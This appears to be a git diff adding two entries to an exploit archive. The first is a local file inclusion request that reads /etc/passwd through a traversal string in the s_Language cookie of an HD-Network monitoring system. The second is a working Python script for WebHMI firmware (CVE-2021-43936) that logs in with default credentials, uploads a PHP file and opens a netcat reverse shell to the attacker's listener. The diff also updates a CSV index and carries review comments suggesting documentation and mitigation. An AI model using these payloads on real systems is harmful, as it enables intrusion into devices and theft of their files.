diff --git a/exploits/linux/remote/50588.txt b/exploits/linux/remote/50588.txt
new file mode 100644
index 000000000..76c2c5fe1
--- /dev/null
+++ b/exploits/linux/remote/50588.txt
@@ -0,0 +1,18 @@
+# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
+# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
+# Date: 11/12/2021
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: N/A
+# Version: V2.0
+# Tested on: Nginx NVRDVRIPC Web Server
+
+Proof of Concept:
+
+GET /language/lang HTTP/1.1
+Referer: http://example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
+Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate,br
+Host: VulnIP
+Connection: Keep-alive
\ No newline at end of file
diff --git a/exploits/php/webapps/50589.py b/exploits/php/webapps/50589.py
new file mode 100755
index 000000000..b6c824a0b
--- /dev/null
+++ b/exploits/php/webapps/50589.py
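Review bot: The header leaves the affected input and the remediation status undocumented — `# Vendor Homepage: N/A`, no CVE or fixed-version line — and only the request body shows that the traversal is carried in the `s_Language` cookie. Add a header line such as `# Affected input: s_Language cookie (path traversal)` and a `# Fix:` line if a vendor fix exists, so defenders indexing this entry can map it to a control. The server-side mitigation would presumably be to resolve the cookie against an allow-list of language identifiers rather than treating its value as a path; that is inferred from the PoC, not stated in the file.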
@@ -0,0 +1,110 @@
+# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 12/12/2021
+# Exploit Author: Jeremiasz Pluta
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI Firmware < 4.1
+# CVE: CVE-2021-43936
+# Tested on: WebHMI Firmware 4.0.7475
+
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import pyfiglet
+import requests
+import time
+import subprocess
+
+banner = pyfiglet.figlet_format("CVE-2021-43936")
+print(banner)
+print('Exploit for CVE-2021-43936')
+print('For: WebHMI Firmware < 4.1')
+
+login = "admin" #CHANGE ME IF NEEDED
+password = "admin" #CHANGE ME IF NEEDED
+
+class Exploit:
+
+ def __init__(self, target_ip, target_port, localhost, localport):
+ self.target_ip = target_ip
+ self.target_port = target_port
+ self.localhost = localhost
+ self.localport = localport
+
+ def exploitation(self):
+ payload = """"""
+ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
+
+ headers_login = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'X-WH-LOGIN': login,
+ 'X-WH-PASSWORD': password,
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Connection': 'close',
+ 'Content-Length': '0'
+ }
+
+ url = 'http://' + target_ip + ':' + target_port
+ r = requests.Session()
+
+ print('[*] Resolving URL...')
+ r1 = r.get(url)
+ time.sleep(3)
+
+ print('[*] Trying to log in...')
+ r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
+ time.sleep(3)
+
+ print('[*] Login redirection...')
+ login_cookies = {
+ 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
+ 'X-WH-CHECK-TRIAL':'true',
+ 'il18next':'en',
+ }
+ r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + 
'&uid=1',cookies=login_cookies)
+ time.sleep(3)
+
+ print('[*] Uploading cmd.php file...')
+ files = {
+ 'file': ('cmd.php', payload, 'application/x-php')
+ }
+ r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)
+ time.sleep(3)
+
+ print('[*] Setting up netcat listener...')
+ listener = subprocess.Popen(["nc", "-nvlp", self.localport])
+ time.sleep(3)
+
+ print('[*] Executing reverse shell...')
+ print('[*] Watchout for shell! :)')
+ r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)
+
+ if (r5.status_code == 200):
+ print('[*] Got shell!')
+ while True:
+ listener.wait()
+ else:
+ print('[-] Something went wrong!')
+ listener.terminate()
+
+def get_args():
+ parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')
+ parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+ parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+ parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
+ parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
+ args = parser.parse_args()
+ return args
+
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 825c527b8..0d1f69f27 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
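Review bot: The header records the affected range (`# Version: WebHMI Firmware < 4.1`) but not the precondition or the root cause, which is what a defender indexing this entry needs: the script only works with valid credentials (`login = "admin"` and `password = "admin"` are hard-coded defaults), and the weakness it relies on is that the `/files.php` upload endpoint accepts an `application/x-php` file that is afterwards reachable under `/uploads/files/`. Add header lines such as `# Precondition: authenticated user (default credentials shown below)` and `# Root cause: unrestricted file upload served from a web-accessible directory`, plus a `# Fix:` line naming the firmware version that closes it, if the vendor advisory states one. As a point of style, `exploitation()` reads the module globals `target_ip`, `target_port`, `localhost` and `localport` instead of the `self.*` attributes that `__init__` stores (only `self.localport` is used), so the class depends on the bottom-of-file assignments. The `#!/usr/bin/python` line sits after the header comments and so is not an interpreter line despite the 100755 mode, and `sys`, `re` and `r1` are unused.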
@@ -18578,6 +18578,7 @@ id,file,description,date,author,type,platform,port
 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
 50576,exploits/linux/remote/50576.py,"Raspberry Pi 5.10 - Default Credentials",1970-01-01,netspooky,remote,linux,
+50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44672,3 +44673,4 @@ id,file,description,date,author,type,platform,port
 50585,exploits/php/webapps/50585.sh,"OpenCATS 0.9.4 - Remote Code Execution (RCE)",1970-01-01,"Nicholas Ferreira",webapps,php,
 50586,exploits/php/webapps/50586.txt,"Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,fuzzyap1,webapps,php,
 50587,exploits/php/webapps/50587.txt,"Free School Management Software 1.0 - Remote Code Execution (RCE)",1970-01-01,fuzzyap1,webapps,php,
+50589,exploits/php/webapps/50589.py,"WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,